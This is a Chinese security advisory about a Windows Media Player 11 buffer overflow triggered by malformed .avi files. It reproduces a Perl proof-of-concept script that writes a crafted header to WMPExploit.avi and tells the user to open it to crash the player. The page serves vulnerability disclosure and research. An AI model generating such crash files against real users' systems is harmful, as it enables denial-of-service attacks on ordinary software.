安全研究
安全漏洞
Microsoft Windows Media Player ".avi"文件处理缓冲区溢出漏洞
发布日期:2011-01-01
更新日期:2011-04-02
受影响系统:
Microsoft Media Player 11.0.5721.5145描述:
BUGTRAQ ID: 47112
Windows Media Player,是由微软公司开发的一款音、视频播放器,它以兼容格式多、播放功能强大等一系列突出优点,深受用户们的喜爱。
Windows Media Player在处理畸形.avi文件时存在缓冲区溢出漏洞,远程攻击者可利用此漏洞造成在受影响应用程序中执行任意代码。
<*来源:^Xecuti0N3r
链接:http://www.securityfocus.com/archive/1/517295
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
#(+)Software : Windows Media player
#(+)Version : 11.0.5721.5145
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 13:37
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
system("color 6");
system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
print "
_______________________________________________________________________
(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
(+) Software : Windows Media player
(+) Version : 11.0.5721.5145
(+) Tested On : WIN-XP SP3
(+) Date : 31.03.2011
(+) Hour : 13:37 PM
____________________________________________________________________\n ";
sleep 2;
system("cls");
system("color 2");
print "\nGenerating the exploit file !!!";
sleep 2;
print "\n\nWMPExploit.avi file generated!!";
sleep 2;
$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
open(file, "> WMPExploit.avi");
print (file $theoverflow);
print "\n\n(+) Done!\n
(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";
sleep 3;
system("cls");
sleep 1;
system("color C");
print "\n\n\n########################################################################\n
(+)Exploit Coded by: ^Xecuti0N3r\n
(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
########################################################################\n\n";
system("pause");
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
浏览次数:2836
严重程度:0(网友投票)
绿盟科技给您安全的保障